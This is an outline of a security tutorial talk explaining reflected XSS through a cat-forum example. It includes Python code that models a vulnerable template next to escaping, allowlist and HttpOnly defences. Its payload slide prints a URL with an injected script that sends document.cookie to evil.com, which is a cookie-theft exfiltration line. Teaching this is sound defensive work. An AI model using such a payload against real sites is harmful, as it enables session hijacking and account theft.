Ep-4: What is XSS
Table Of Contents
Scope
- Questions to be answered
- What is Reflected XSS (Cross-Site Scripting)?
- How does Reflected XSS compare to other types of XSS?
- What does a Reflected XSS payload look like?
- 80/20 Analysis
Reflected XSS Ex: Scenario
- Explore definition through example
- Scenario
- Website forum for cat lovers
- User just clicked on a link to show all cat photos on site
Reflected XSS Ex: Search Results View
- Browser Request
- Server Response
- Problems?
- Alert: User submitted input is reflected into the response
- Reflected XSS
- "But wait, how is this untrusted?!"
- We'll explore this soon
Reflected XSS Ex: Back-end Code
Portion of Server-side Template
- Alert
- User input isn't validated against a whitelist
- Using string concatenation with user input
Reflected XSS Ex: Payload
Url View with payload
http://cats.example.com?search='><script>document.location='http://evil.com/receiver?cookie='+document.cookie</script>
Server-side Template View
HTML View
Reflected XSS Ex: Payload Eval Order
- Eval order
- document.cookie
- A string containing a semicolon-separated list of all cookies (i.e. key=value pairs)
- document.location
- Redirection logic
- evil.com can view submitted cookie string
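The talk's slides show the flawed server-side template only as an image, so the following is an added example (not the speaker's code) that models the two alerts from the "Back-end Code" slide and the payload slide, plus the cookie point from the eval-order slide. `render_vulnerable` is a hypothetical stand-in for the template that concatenates the `search` parameter straight into the page; `render_escaped` applies contextual HTML escaping, `validate_search` applies an allowlist (the character set and length limit are assumptions for the example), and `session_cookie_header` sets the session cookie with `HttpOnly`, which keeps it out of `document.cookie` even if a script does run. The payload string is the one quoted on the page above.

```python
import html
import re
from http.cookies import SimpleCookie
from typing import Optional

# The reflected payload shown on the page above (copied, not constructed here).
PAGE_PAYLOAD = ("'><script>document.location="
                "'http://evil.com/receiver?cookie='+document.cookie</script>")

# Assumed allowlist for a cat-photo search term: letters, digits, spaces and
# hyphens, 1-64 characters. Real policies depend on the application.
SEARCH_TERM_RE = re.compile(r"[A-Za-z0-9 \-]{1,64}")


def render_vulnerable(search: str) -> str:
    """Hypothetical model of the flawed template: raw string concatenation
    of user input into an attribute and into element text."""
    return ("<input name=\"search\" value='" + search + "'>"
            "<p>Results for " + search + "</p>")


def render_escaped(search: str) -> str:
    """Same page, but the input is HTML-escaped (quote=True also escapes
    both quote characters, so it is safe inside a quoted attribute)."""
    escaped = html.escape(search, quote=True)
    return ("<input name=\"search\" value=\"" + escaped + "\">"
            "<p>Results for " + escaped + "</p>")


def validate_search(search: str) -> Optional[str]:
    """Allowlist validation: return the term if it matches the policy,
    otherwise None. fullmatch anchors the pattern at both ends."""
    return search if SEARCH_TERM_RE.fullmatch(search) else None


def render_hardened(search: str) -> str:
    """Defence in depth: allowlist first, then escape on output anyway."""
    term = validate_search(search)
    if term is None:
        return "<p>Invalid search term.</p>"
    return render_escaped(term)


def session_cookie_header(session_id: str) -> str:
    """Value of a Set-Cookie header for the session cookie. HttpOnly removes
    it from document.cookie; Secure and SameSite are added as usual hygiene."""
    cookie = SimpleCookie()
    cookie["session"] = session_id
    cookie["session"]["httponly"] = True
    cookie["session"]["secure"] = True
    cookie["session"]["samesite"] = "Lax"
    # output(header="") yields " session=...; ..." so strip the leading space.
    return cookie.output(header="").strip()


def contains_script_element(markup: str) -> bool:
    """Crude check used by the demo: does a <script start tag survive?"""
    return "<script" in markup.lower()


if __name__ == "__main__":
    print("vulnerable :", render_vulnerable(PAGE_PAYLOAD))
    print("escaped    :", render_escaped(PAGE_PAYLOAD))
    print("hardened   :", render_hardened(PAGE_PAYLOAD))
    print("valid term :", render_hardened("tabby cats"))
    print("Set-Cookie :", session_cookie_header("abc123"))
```

Running the block prints the four renderings side by side: only the vulnerable one still contains a `<script` start tag, the escaped one carries `&lt;script&gt;` as inert text, and the hardened one rejects the term outright while still rendering an ordinary search like `tabby cats`. Escaping on output is the essential fix; the allowlist is an extra layer, and `HttpOnly` limits what a script could read if every other layer failed.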
Reflected XSS Ex: Live Ex
Reflected XSS Summation
- Process recap
- A victim clicks on a link with the payload
- trusted.example.com/PAYLOADHERE
- The payload goes to trusted.example.com
- The payload is embedded in the response
- The payload is reflected back to the user
- Malicious JavaScript sends trusted.example.com's cookies to evil.example.com
- Attack vectors
- Payload at the end of a long link
- When previewing a link, only first x characters are easily viewable
- Link shortener
XSS Types
- Persistent
- Stored XSS
- Non-Persistent
- Reflected XSS
- DOM XSS